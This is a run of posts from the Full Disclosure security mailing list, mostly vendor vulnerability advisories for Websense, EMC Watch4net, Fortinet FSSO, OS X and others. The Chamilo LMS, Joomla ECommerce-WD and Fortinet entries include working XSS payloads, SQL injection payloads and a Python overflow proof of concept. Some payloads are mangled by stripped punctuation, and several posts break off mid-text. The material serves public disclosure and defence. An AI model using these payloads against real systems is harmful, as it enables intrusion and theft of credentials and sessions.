Re: [FD] Multiple Buffer Overflows in Diagnostic Troubleshooting Wizard - msdt.exe - Win 8.0 Pro - x64
relevent to your 'buffer overflow' posts that are not real issues: http://blogs.technet.com/b/markrussinovich/archive/2005/05/17/buffer-overflows.aspx http://superuser.com/questions/491597/process-monitor-entrys-with-buffer-overflow ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Websense Email Security vulnerable to persistent Cross-Site Scripting in audit log details view
Websense Email Security vulnerable to persistent Cross-Site Scripting in audit log details view Han Sahin, September 2014 Abstract Users of Websense Data Security that are reviewing DLP incidents can be attacked via Cross-Site Scripting. This issue can be exploited using a specially crafted email, or by sending a specially crafted HTTP request through the Websense proxy. The attacker-supplied code can perform a wide variety of attacks, such as stealing session tokens, login credentials, performing arbitrary actions as victims, or logging victims' keystrokes. Tested versions This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well. Fix This issue is resolved in TRITON APX Version 8.0. More information about the fixed can be found at the following location: http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0 Details https://www.securify.nl/advisory/SFY20140905/websense_email_security_vulnerable_to_persistent_cross_site_scripting_in_audit_log_details_view.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Command injection vulnerability in network diagnostics tool of Websense Appliance Manager
Command injection vulnerability in network diagnostics tool of Websense Appliance Manager Han Sahin, September 2014 Abstract A command injection vulnerability was found in Websense Appliance Manager that allows an attacker to execute arbitrary code on the appliance. This issue can be combined with other vulnerabilities, like Cross-Site Scripting, to perform a remote unauthenticated attacks to compromise the appliance. Tested versions This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well. Fix Websense released hotfix 02 for Websense Triton v7.8.4 in which this issue is fixed. More information about this hotfix can be found at the following location: http://www.websense.com/support/article/kbarticle/v7-8-4-About-Hotfix-02-for-Web-Security-Solutions This issue is resolved in TRITON APX Version 8.0. More information about the fixed can be found at the following location: http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0 Details https://www.securify.nl/advisory/SFY20140906/command_injection_vulnerability_in_network_diagnostics_tool_of_websense_appliance_manager.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Cross-Site Scripting vulnerability in Websense Explorer report scheduler
Cross-Site Scripting vulnerability in Websense Explorer report scheduler Han Sahin, September 2014 Abstract It was discovered that the report scheduler of Websense Explorer is vulnerable to Cross-Site Scripting. Cross-Site Scripting allows an attacker to perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tested versions This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well. Fix Websense released hotfix 02 for Websense Triton v7.8.4 in which this issue is fixed. More information about this hotfix can be found at the following location: http://www.websense.com/support/article/kbarticle/v7-8-4-About-Hotfix-02-for-Web-Security-Solutions This issue is resolved in TRITON APX Version 8.0. More information about the fixed can be found at the following location: http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0 Details https://www.securify.nl/advisory/SFY20140911/cross_site_scripting_vulnerability_in_websense_explorer_report_scheduler.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Missing access control on Websense Explorer web folder
Missing access control on Websense Explorer web folder Han Sahin, September 2014 Abstract It was discovered that no access control is enforced on the explorer_wse path, which is exposed through the web server. An attacker can abuse this issue to download any file exposed by this path, including security reports and Websense Explorer configuration files. Tested versions This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well. Fix This issue is resolved in TRITON APX Version 8.0. More information about the fixed can be found at the following location: http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0 Details https://www.securify.nl/advisory/SFY20140909/missing_access_control_on_websense_explorer_web_folder.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Websense Data Security DLP incident Forensics Preview is vulnerable to Cross-Site Scripting
Websense Data Security DLP incident Forensics Preview is vulnerable to Cross-Site Scripting Han Sahin, September 2014 Abstract Users of Websense Data Security that are reviewing DLP incidents can be attacked via Cross-Site Scripting. This issue can be exploited using a specially crafted email, or by sending a specially crafted HTTP request through the Websense proxy. The attacker-supplied code can perform a wide variety of attacks, such as stealing session tokens, login credentials, performing arbitrary actions as victims, or logging victims' keystrokes. Tested versions This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well. Fix Websense created a workaround to address this issue. System - Reporting - Secure forensics with plain-text A permanent fix will be included in Websense TRITON APX version 8.1, scheduled to be release in August, 2015. Details https://www.securify.nl/advisory/SFY20140904/websense_data_security_dlp_incident_forensics_preview_is_vulnerable_to_cross_site_scripting.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Upcoming new OpenSSL version with high severity security issues
Hi, to just let you know: There is a new OpenSSL version upcoming in about two days with some fixed security issues with the severity high: The OpenSSL project team would like to announce the forthcoming release of OpenSSL versions 1.0.2a, 1.0.1m, 1.0.0r and 0.9.8zf. These releases will be made available on 19th March. They will fix a number of security defects. The highest severity defect fixed by these releases is classified as high severity. Source is the official OpenSSL announce mailing list: https://mta.openssl.org/pipermail/openssl-announce/2015-March/20.html Best regards, Patrik ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Mac OS X 10.10.2 kernel extension heap overflow resulting in LPE
Hello, I have recently found an exploitable heap overflow in a core OS X driver. Particularly, the injectString function is vulnerable to an heap overflow and can be triggered without privileges of any kind. The vulnerable function can be seen at http://opensource.apple.com/source/IOHIDFamily/IOHIDFamily-503.200.2/IOHIDSystem/IOHIDSecurePromptClient.cpp I wrote a weaponized poc at http://github.com/kpwn/vpwn. The KASLR leak included is not reliable across macs. It works only on Macs with AMD (no FirePro) GPUs. (Tested on a last gen 5K Retina iMac). It was the only one I'd sacrifice for a public PoC because of that constraint. It's disabled by default too, but it's trivial to enable it by editing lsym_priv.h. It does not completely clean up it's own mess, so running ioreg after running the PoC will likely crash your box. The particular IOKit service has been involved in a CVE in October. It had functions that could literally not be used without crashing the kernel. There still are other unsafe functions in that very same file. Apple has disabled the service in particular on the latest 10.10.3 beta possible due to those other bugs. I do not believe they are aware of this issue in particular. But this is pure speculation, and it doesn't matter in the end, since the vulnerability cannot be triggered anymore. Let me know what you think and sorry for the wall of text, Luca Todesco. -qwertyoruiop ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Mac OS X 10.10.2 IOHIDFamily.kext IOHIDSecurePromptClient Heap Overflow
Hello, I have recently found an exploitable heap overflow in a core OS X driver. Particularly, the injectString function is vulnerable to an heap overflow and can be triggered without privileges of any kind. The vulnerable function can be seen at http://opensource.apple.com/source/IOHIDFamily/IOHIDFamily-503.200.2/IOHIDSystem/IOHIDSecurePromptClient.cpp I wrote a weaponized poc at http://github.com/kpwn/vpwn. The KASLR leak is not reliable. It works only on Macs with AMD (no FirePro) GPUs. (Tested on a last gen 5K Retina iMac). It was the only one I'd sacrifice for a public PoC because of that constraint. It does not completely clean up it's own mess, so running ioreg after running the PoC will likely crash your box. The particular IOKit service has been involved in a CVE in October. It had functions that could literally not be used without crashing the kernel. There still are other unsafe functions in that very same file. Apple has disabled the service in particular on the latest 10.10.3 beta possible due to those other bugs. I do not believe they are aware of this issue in particular. But this is pure speculation, and it doesn't matter in the end, since the vulnerability cannot be triggered anymore. Let me know what you think, Luca Todesco. -qwertyoruiop ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Chamilo LMS 1.9.10 Multiple XSS CSRF Vulnerabilities
I. Overview Chamilo LMS 1.9.10 or prior versions are prone to a multiple Cross-Site Scripting (Stored + Reflected) CSRF vulnerabilities. These vulnerabilities allows an attacker to gain control over valid user accounts in LMS, perform operations on their behalf, redirect them to malicious sites, steal their credentials, and more. II. Severity Rating: High Remote: Yes Authentication Require: Yes CVE-ID: III. Vendor's Description of Application Chamilo LMS, or Chamilo Learning Management System is a piece of software that allows you to create a virtual campus for the provision of online or semi-online training. It is distributed under the GNU/GPLv3+ license and its development process is public. All the Chamilo software products are entirely free (as in freedom), free (as in beer) and complete, and are production-ready without requiring any type of payment. https://chamilo.org/chamilo-lms/ IV. Vulnerability Details Exploit 1) Multiple Reflected XSS Request Request Method = GET XSS PoC's:- /main/calendar/agenda_list.php?type=personal%27%20onmouseover=%27confirm%280%29%27/%3E%3C!-- /main/messages/outbox.php?f=social+onmouseover=confirm(0) /main/mySpace/student.php?keyword=31337+onmouseover=confirm(0)//active=0_qf__search_user=submit=Search /main/inc/lib/fckeditor/editor/plugins/ajaxfilemanager/ajax_get_file_listing.php?editor=stand_aloneview=thumbnailsearch=1search_name=adminsearch_recursively=0search_mtime_from=search_mtime_to=search_folder=;/scriptscriptconfirm(0)/script /main/admin/configure_extensions.php?display=/scriptscriptconfirm(0)/script /main/admin/course_category.php?action=addcategory=/scriptconfirm(0)/script /main/admin/session_edit.php?page=resume_session.php%22%20onmouseover=confirm%280%29//id=1 b) User Agent Header XSS (Reflected) GET /main/admin/system_status.php?section=webserver User-Agent: scriptconfirm(0)/script __ 2) Stored XSS File Attachment Description parameter (legend[]) is vulnerable to Stored XSS By utilizing social network an attacker may send a crafted message to anybody with XSS payload in the file attachment description field (i.e legend[]) Request Method : POST Location = /main/messages/new_message.php?f=social Parameter = legend[] Stored XSS PoC :- POST /main/messages/new_message.php?f=social HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml +xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/main/messages/new_message.php?f=social Cookie: XX Connection: keep-alive Content-Type: multipart/form-data; boundary=---8461144986726 Content-Length: 1023 -8461144986726 Content-Disposition: form-data; name=users[] 3 -8461144986726 Content-Disposition: form-data; name=title Stored XSS Test Via Social network -8461144986726 Content-Disposition: form-data; name=content This is test messageBR -8461144986726 Content-Disposition: form-data; name=attach_1; filename=test.txt Content-Type: text/plain I owned you -8461144986726 Content-Disposition: form-data; name=legend[] Cool File scriptconfirm(0)/script -8461144986726 Content-Disposition: form-data; name=compose -8461144986726 Content-Disposition: form-data; name=_qf__compose_message -8461144986726 Content-Disposition: form-data; name=sec_token 42917ca29da38f60d49bbaf2ba89b1b9 -8461144986726-- 3) CSRF Stored XSS Request Method = POST Location = /main/admin/session_add.php Parameter = name POST /main/admin/session_add.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml +xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1//main/admin/session_add.php Cookie:XX Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 231 formSent=1name=scriptconfirm(0)/scriptcoach_username=rehansession_category=0nb_days_acess_before=0nb_days_acess_after=0start_limit=onday_start=2month_start=3year_start=2015end_limit=onday_end=2month_end=3year_end=2016session_visibility=2 CSRF PoC:- html !-- CSRF Request With Stored XSS Payload -- body form
[FD] Web-Dorado ECommerce-WD for Joomla plugin multiple unauthenticated SQL injections
Version 1.2.5 of the ECommerce-WD plugin for Joomla! has multiple unauthenticated SQL injections available via the advanced search functionality. http://extensions.joomla.org/extension/ecommerce-wd The vulnerable parameters are search_category_id, sort_order, and filter_manufacturer_ids within the following request: POST /index.php?option=com_ecommercewdcontroller=productstask=displayproducts HTTP/1.1 Host: 172.31.16.49 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://172.31.16.49/index.php?option=com_ecommercewdview=productslayout=displayproductsItemid=120 Cookie: 78fdafa5595397a1fc885bb2f0d74010=q1q1ud2sr0la18o5b38mkbdak2 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 321 product_id=product_count=product_parameters_json=search_name=search_category_id=filter_filters_opened=1filter_manufacturer_ids=1filter_price_from=filter_price_to=filter_date_added_range=0filter_minimum_rating=0filter_tags=arrangement=thumbssort_by=sort_order=ascpagination_limit_start=0pagination_limit=12 Vectors: Parameter: filter_manufacturer_ids (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: product_id=product_count=product_parameters_json=search_name=search_category_id=1filter_filters_opened=1filter_manufacturer_ids=1) AND 8066=8066 AND (7678=7678filter_price_from=filter_price_to=filter_date_added_range=0filter_minimum_rating=0filter_tags=arrangement=thumbssort_by=sort_order=ascpagination_limit_start=0pagination_limit=12 Type: error-based Title: MySQL = 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: product_id=product_count=product_parameters_json=search_name=search_category_id=1filter_filters_opened=1filter_manufacturer_ids=1) AND (SELECT 7197 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT (ELT(7197=7197,1))),0x71706a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1212=1212filter_price_from=filter_price_to=filter_date_added_range=0filter_minimum_rating=0filter_tags=arrangement=thumbssort_by=sort_order=ascpagination_limit_start=0pagination_limit=12 Type: AND/OR time-based blind Title: MySQL 5.0.11 AND time-based blind (SELECT) Payload: product_id=product_count=product_parameters_json=search_name=search_category_id=1filter_filters_opened=1filter_manufacturer_ids=1) AND (SELECT * FROM (SELECT(SLEEP(5)))SrXu) AND (1480=1480filter_price_from=filter_price_to=filter_date_added_range=0filter_minimum_rating=0filter_tags=arrangement=thumbssort_by=sort_order=ascpagination_limit_start=0pagination_limit=12 Parameter: search_category_id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: product_id=product_count=product_parameters_json=search_name=search_category_id=1) AND 3039=3039 AND (6271=6271filter_filters_opened=1filter_manufacturer_ids=1filter_price_from=filter_price_to=filter_date_added_range=0filter_minimum_rating=0filter_tags=arrangement=thumbssort_by=sort_order=ascpagination_limit_start=0pagination_limit=12 Type: error-based Title: MySQL = 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: product_id=product_count=product_parameters_json=search_name=search_category_id=1) AND (SELECT 5158 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT (ELT(5158=5158,1))),0x71706a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (8257=8257filter_filters_opened=1filter_manufacturer_ids=1filter_price_from=filter_price_to=filter_date_added_range=0filter_minimum_rating=0filter_tags=arrangement=thumbssort_by=sort_order=ascpagination_limit_start=0pagination_limit=12 Type: AND/OR time-based blind Title: MySQL 5.0.11 AND time-based blind (SELECT) Payload: product_id=product_count=product_parameters_json=search_name=search_category_id=1) AND (SELECT * FROM (SELECT(SLEEP(5)))AUWc) AND (1251=1251filter_filters_opened=1filter_manufacturer_ids=1filter_price_from=filter_price_to=filter_date_added_range=0filter_minimum_rating=0filter_tags=arrangement=thumbssort_by=sort_order=ascpagination_limit_start=0pagination_limit=12 Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: product_id=product_count=product_parameters_json=search_name=search_category_id=1) UNION ALL SELECT CONCAT(0x71786a6b71,0x704f43796c4773545349,0x71706a6a71)-- filter_filters_opened=1filter_manufacturer_ids=1filter_price_from=filter_price_to=filter_date_added_range=0filter_minimum_rating=0filter_tags=arrangement=thumbssort_by=sort_order=ascpagination_limit_start=0pagination_limit=12 Parameter: sort_order (POST) Type: boolean-based blind Title: MySQL = 5.0 boolean-based blind - ORDER BY, GROUP BY clause Payload:
Re: [FD] Regarding how can I request a CVE number?
Hi XZ, I managed to get a number of CVEs last year, but towards the end of the year they simply stopped replying, so I've given up. Whether they stopped replying due to work load, or whether my submissions were not up to their requirements I'm not sure. If you find out any more, I'd be interested in knowing why they've stopped assigning CVEs to certain submission sources. Kind regards, James H On Tue, Mar 17, 2015 at 11:25 PM, XiaopengZhang tfr...@yeah.net wrote: Hi Guys, I discovered several Vuls and have reported them to the vendors, so I'd like to request the CVE for them.(The vendor did not want to request CVE) I ever sent some emails to cve-ass...@mitre.org for applying for CVE. But so far still nobody replys them. I dont know what happend about this email box. Is my email recognised as spam? Or do I need write the email content in a special format? So please, can somebody here help me? Thanks Best wishes, XZ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Multiple Cross-Site Scripting vulnerabilities in Websense Reporting
Multiple Cross-Site Scripting vulnerabilities in Websense Reporting Han Sahin, September 2014 Abstract It has been found that Websense Reporting is affected by multiple Cross-Site Scripting issues. Cross-Site Scripting allows an attacker to perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tested versions This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well. Fix Websense released hotfix 02 for Websense Triton v7.8.4 in which this issue is fixed. More information about this hotfix can be found at the following location: http://www.websense.com/support/article/kbarticle/v7-8-4-About-Hotfix-02-for-Web-Security-Solutions This issue is resolved in TRITON APX Version 8.0. More information about the fixed can be found at the following location: http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0 Details https://www.securify.nl/advisory/SFY20140914/multiple_cross_site_scripting_vulnerabilities_in_websense_reporting.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] [CORE-2015-0006] - Fortinet Single Sign On Stack Overflow
1. Advisory Information Title: Fortinet Single Sign On Stack Overflow Advisory ID: CORE-2015-0006 Advisory URL: http://www.coresecurity.com/advisories/fortinet-single-sign-on-stack-overflow Date published: 2015-03-18 Date of last update: 2015-03-18 Vendors contacted: Fortinet Release mode: Coordinated release 2. Vulnerability Information Class: Stack-based Buffer Overflow [CWE-121] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2015-2281 3. Vulnerability Description Through Fortniet [1] Single Sign On or Single User Sign On users logged on to a computer network are authenticated for access to network resources through the FortiGate unit without having to enter their username and password again. Fortinet Single Sign On (FSSO) provides Single Sign On capability for Microsoft Windows networks using either Active Directory or NTLM authentication and Novell networks, using eDirectory. FSSO [4] monitors user logons and sends the FortiGate unit the username, IP address, and the list of Windows AD user groups to which the user belongs. When the user tries to access network resources, the FortiGate unit selects the appropriate security policy for the destination. If the user belongs to one of the permitted user groups, the connection is allowed. There is a vulnerability in the message dispatcher used by FSSO Windows Active Directory and FSSO Novell eDirectory. Exploitation of this vulnerability might lead to a full network compromise. 4. Vulnerable packages - FSSO Windows Active Directory 4.3.0161 (4.3.0151, 4.3.0129 were also tested and found vulnerable) - FSSO Novell eDirectory 4.3.0161 Other versions are probably affected too, but they were not checked. 5. Vendor Information, Solutions and Workarounds Core Security recommends those affected use third party software such as Sentinel [3] or EMET [2] that could help to prevent the exploitation of affected systems to some extent. Fortinet published the following FortiGuard Bulletin: [5] 6. Credits This vulnerability was discovered and researched by Enrique Nissim in collaboration with Andres Lopez Luksenberg, both from the Core Security Exploit Writing Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security Advisories Team. 7. Technical Description / Proof of Concept Code [CVE-2015-2281] The vulnerability in both cases can be exploited by sending a special packet to the services without being authenticated (pre-auth). Given that both software systems require and Administrative account in order to run, (Windows Domain Admin or eDirectory Admin accordingly) the full network is exposed. Pre-authenticated Remote Code Execution with Domain Administrative rights is possible. The vulnerability is located in the Message Dispatcher for message PROCESS_HELLO. Here is a PoC (Proof of Concept) that causes the application thread with the FortiGate appliance to crash: import socket import struct TARGET_IP = 192.168.233.100 def play(): message = \x80\x01\x42\x42 buff = A*248 buff += B * (0xf - len(buff)) payload = struct.pack(I, 0x000f) + message + buff s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET_IP, 8000)) s.send(payload) buff_recv = s.recv(6000) print buff_recv s.close() play() 8. Report Timeline 2015-01-07: Core Security notifies Fortinet of the vulnerabilities. Publication date is set for February 2nd, 2015. 2015-01-09: Fortinet requests a copy of the advisory draft. 2015-01-09: Core Security sends a draft copy of the advisory to the vendor. 2015-01-14: Fortinet informs they are in the process of validating the report and asks if we want to commit to responsible disclosure. 2015-01-14: Core Security informs the vendor that our policy is to publish our findings in order to help the users to gain awareness of the issues and therefore allowing them to take the necessary precautions to protect themselves. We informed them that we always try to release our findings in a coordinate manner provided that the time the vendor takes to test and fix the issue is reasonable and the publication of this solution and our disclosure is agreed between the two parties. 2015-01-21: Core Security asks the vendor if they were able to review the vulnerabilities and a tentative date for publishing the fix and consequently the advisory. 2015-01-27: Fortinet acknowledges the vulnerabilities and informs that a fix of the source code is in order. The say they'll keep us updated regarding the release schedule. 2015-02-24: Fortinet informed us that the current ETA was the first week of March, but that it could be changed depending on their engineering load. 2015-02-24: Core Security requested a specific date considering that the first week of March was next week. 2015-02-27: Fortinet informed us that they currently don't have a fixed date.
[FD] EMC MR (Watch4net) data storage collector credentials are not properly protected
EMC MR (Watch4net) data storage collector credentials are not properly protected Han Sahin, November 2014 Abstract It was discovered that EMC MR (Watch4net) credentials of remote servers stored in Watch4net are encrypted using a fixed hardcoded password. If an attacker manages to obtain a copy of the encrypted credentials, it is trivial to decrypt them. Affected products EMC reports that the following products are affected by this vulnerability: - EMC MR (Watch4Net) versions prior 6.5u1 - EMC ViPR SRM versions prior to 3.6.1 See also - CVE-2015-0514 - ESA-2015-004: EMC MR (Watch4Net) Multiple Vulnerabilities Fix EMC released the following updated versions that resolve this vulnerability: - EMC MR (Watch4Net) 6.5u1 - EMC ViPR SRM 3.6.1 Registered customers can download upgraded software from support.emc.com at https://support.emc.com/downloads/34247_ViPR-SRM. Details https://www.securify.nl/advisory/SFY20141101/emc_m_r__watch4net__data_storage_collector_credentials_are_not_properly_protected.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Cross-Site Scripting vulnerability in EMC MR (Watch4net) Web Portal Report Favorites
Cross-Site Scripting vulnerability in EMC MR (Watch4net) Web Portal Report Favorites Han Sahin, November 2014 Abstract A Cross-Site Scripting vulnerability was found in EMC MR (Watch4net) Web Portal. This issue allows attackers to replace the report that is shown at startup, the attackers payload will be stored in the user's profile and will be executed every time the victim logs in. The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, logging their keystrokes, or exploit issues in other areas of Watch4net. Affected products EMC reports that the following products are affected by this vulnerability: - EMC MR (Watch4Net) versions prior 6.5u1 - EMC ViPR SRM versions prior to 3.6.1 See also - CVE-2015-0513 - ESA-2015-004: EMC MR (Watch4Net) Multiple Vulnerabilities Fix EMC released the following updated versions that resolve this vulnerability: - EMC MR (Watch4Net) 6.5u1 - EMC ViPR SRM 3.6.1 Registered customers can download upgraded software from support.emc.com at https://support.emc.com/downloads/34247_ViPR-SRM. Details https://www.securify.nl/advisory/SFY20141102/cross_site_scripting_vulnerability_in_emc_m_r__watch4net__web_portal_report_favorites.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Cross-Site Scripting vulnerability in EMC MR (Watch4net) Centralized Management Console
Cross-Site Scripting vulnerability in EMC MR (Watch4net) Centralized Management Console Han Sahin, November 2014 Abstract A Cross-Site Scripting vulnerability was found in EMC MR (Watch4net) Centralized Management Console. This issue allows attackers to perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, logging their keystrokes, or exploit issues in other areas of Watch4net. Affected products EMC reports that the following products are affected by this vulnerability: - EMC MR (Watch4Net) versions prior 6.5u1 - EMC ViPR SRM versions prior to 3.6.1 See also - CVE-2015-0513 - ESA-2015-004: EMC MR (Watch4Net) Multiple Vulnerabilities Fix EMC released the following updated versions that resolve this vulnerability: - EMC MR (Watch4Net) 6.5u1 - EMC ViPR SRM 3.6.1 Registered customers can download upgraded software from support.emc.com at https://support.emc.com/downloads/34247_ViPR-SRM. Details https://www.securify.nl/advisory/SFY20141103/cross_site_scripting_vulnerability_in_emc_m_r__watch4net__centralized_management_console.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Cross-Site Scripting vulnerability in EMC MR (Watch4net) Alerting Frontend
Cross-Site Scripting vulnerability in EMC MR (Watch4net) Alerting Frontend Han Sahin, November 2014 Abstract A Cross-Site Scripting vulnerability was found in EMC MR (Watch4net) Alerting Frontend. This issue allows attackers to perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, logging their keystrokes, or exploit issues in other areas of Watch4net. Affected products EMC reports that the following products are affected by this vulnerability: - EMC MR (Watch4Net) versions prior 6.5u1 - EMC ViPR SRM versions prior to 3.6.1 See also - CVE-2015-0513 - ESA-2015-004: EMC MR (Watch4Net) Multiple Vulnerabilities Fix EMC released the following updated versions that resolve this vulnerability: - EMC MR (Watch4Net) 6.5u1 - EMC ViPR SRM 3.6.1 Registered customers can download upgraded software from support.emc.com at https://support.emc.com/downloads/34247_ViPR-SRM. Details https://www.securify.nl/advisory/SFY20141104/cross_site_scripting_vulnerability_in_emc_m_r__watch4net__alerting_frontend.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Path traversal vulnerability in EMC MR (Watch4net) MIB Browser
Path traversal vulnerability in EMC MR (Watch4net) MIB Browser Han Sahin, November 2014 Abstract A path traversal vulnerability was found in EMC MR (Watch4net) MIB Browser. This vulnerability allows an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries. Affected products EMC reports that the following products are affected by this vulnerability: - EMC MR (Watch4Net) versions prior 6.5u1 - EMC ViPR SRM versions prior to 3.6.1 See also - CVE-2015-0516 - ESA-2015-004: EMC MR (Watch4Net) Multiple Vulnerabilities Fix EMC released the following updated versions that resolve this vulnerability: - EMC MR (Watch4Net) 6.5u1 - EMC ViPR SRM 3.6.1 Registered customers can download upgraded software from support.emc.com at https://support.emc.com/downloads/34247_ViPR-SRM. Details https://www.securify.nl/advisory/SFY20141105/path_traversal_vulnerability_in_emc_m_r__watch4net__mib_browser.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Path traversal vulnerability in EMC MR (Watch4net) Device Discovery
Path traversal vulnerability in EMC MR (Watch4net) Device Discovery Han Sahin, November 2014 Abstract A path traversal vulnerability was found in EMC MR (Watch4net) Device Discovery. This vulnerability allows an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries. Affected products EMC reports that the following products are affected by this vulnerability: - EMC MR (Watch4Net) versions prior 6.5u1 - EMC ViPR SRM versions prior to 3.6.1 See also - CVE-2016-0516 - ESA-2015-004: EMC MR (Watch4Net) Multiple Vulnerabilities Fix EMC released the following updated versions that resolve this vulnerability: - EMC MR (Watch4Net) 6.5u1 - EMC ViPR SRM 3.6.1 Registered customers can download upgraded software from support.emc.com at https://support.emc.com/downloads/34247_ViPR-SRM. Details https://www.securify.nl/advisory/SFY20141106/path_traversal_vulnerability_in_emc_m_r__watch4net__device_discovery.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] EMC Secure Remote Services Virtual Edition Provisioning component is affected by SQL injection
